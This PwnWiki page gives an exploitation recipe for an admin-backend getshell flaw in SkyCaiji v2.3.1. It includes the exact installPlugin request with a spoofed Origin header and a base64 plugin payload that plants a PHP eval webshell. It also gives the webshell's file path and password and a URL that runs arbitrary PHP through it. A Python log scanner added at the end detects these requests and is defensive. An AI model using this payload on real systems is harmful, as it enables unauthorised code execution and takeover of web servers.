藍天採集器 (SkyCaiji) v2.3.1 admin backend getshell vulnerability

From PwnWiki
Revision as of 09:41, 17 May 2021 by Pwnwiki

Exploitation

Request:

http://www.0-sec.org/index.php?s=/Admin/Store/installPlugin

Add the HTTP header Origin:

http://www.0-sec.org

POST:

plugin=eyJhcHAiOiJBYUFhQWEiLCJuYW1lIjoidGVzdDEiLCJ0eXBlIjoicmVsZWFzZSIsIm1vZHVsZSI6InRlc3QyIiwiY29kZSI6IlBEOXdhSEFLTHlvS2JtRnRaWE53WVdObElIQnNkV2RwYmx4eVpXeGxZWE5sWEdOdGN6c0tDbU5zWVhOeklFRmhRV0ZCWVhzS0NYQjFZbXhwWXlBa2NtVnNaV0Z6WlRzS2ZTb3ZDa0JsZG1Gc0tDUmZSMFZVVzJGZEtUc0tQejQ9In0=

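A one-line backdoor named AaAaAa.php is then created under \plugin\release\cms\; its password is a.

Next, in the admin backend, click the publish-plugin tab, then click the develop button.

At this point the file containing our one-line webshell is included. Adding the a parameter to the URL executes arbitrary PHP code, which leads to getshell. Taking phpinfo as an example, request: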

http://www.0-sec.org/index.php?s=/admin/Develop/releaseCms&app=AaAaAa&a=phpinfo();
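A log check for the two requests described above, as an added example that is not part of the original page: it scans web access logs for POSTs to the installPlugin route and for releaseCms requests that carry query parameters beyond s and app. The log lines are constructed samples, and the combined log format and the set of expected releaseCms parameters are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [17/May/2021:09:40:01 +0000] "POST /index.php?s=/Admin/Store/installPlugin HTTP/1.1" 200 52 "-" "curl/7.68.0"
203.0.113.5 - - [17/May/2021:09:41:12 +0000] "GET /index.php?s=/admin/Develop/releaseCms&app=AaAaAa&a=phpinfo(); HTTP/1.1" 200 90211 "-" "Mozilla/5.0"
198.51.100.7 - - [17/May/2021:09:42:30 +0000] "GET /index.php?s=/admin/Develop/releaseCms&app=wordpress HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
198.51.100.7 - - [17/May/2021:09:43:02 +0000] "GET /index.php?s=/Admin/Index/index HTTP/1.1" 200 8300 "-" "Mozilla/5.0"
"""

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# Assumption: a normal releaseCms request carries only these query parameters.
EXPECTED_RELEASE_PARAMS = {"s", "app"}


def classify(line):
    """Return (client_ip, reason) for a request worth reviewing, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    ip, method, target, _status = m.groups()
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    # Only the ?s= routing form shown on the page is handled here.
    # Matched case-insensitively: the page uses both /Admin and /admin.
    route = params.get("s", [""])[0].strip("/").lower()
    if route == "admin/store/installplugin" and method == "POST":
        return ip, "plugin install request: verify it was an intended admin action"
    if route == "admin/develop/releasecms":
        extra = sorted(set(params) - EXPECTED_RELEASE_PARAMS)
        if extra:
            return ip, "releaseCms with unexpected parameter(s): " + ",".join(extra)
    return None


def scan(log_text):
    """Classify every line and return the list of (client_ip, reason) hits."""
    hits = []
    for line in log_text.splitlines():
        hit = classify(line)
        if hit:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for ip, reason in scan(SAMPLE_LOG):
        print(ip, reason)
```

Access logs do not record POST bodies, so a hit on the install route is a prompt to check \plugin\release\cms\ for PHP files that no administrator installed.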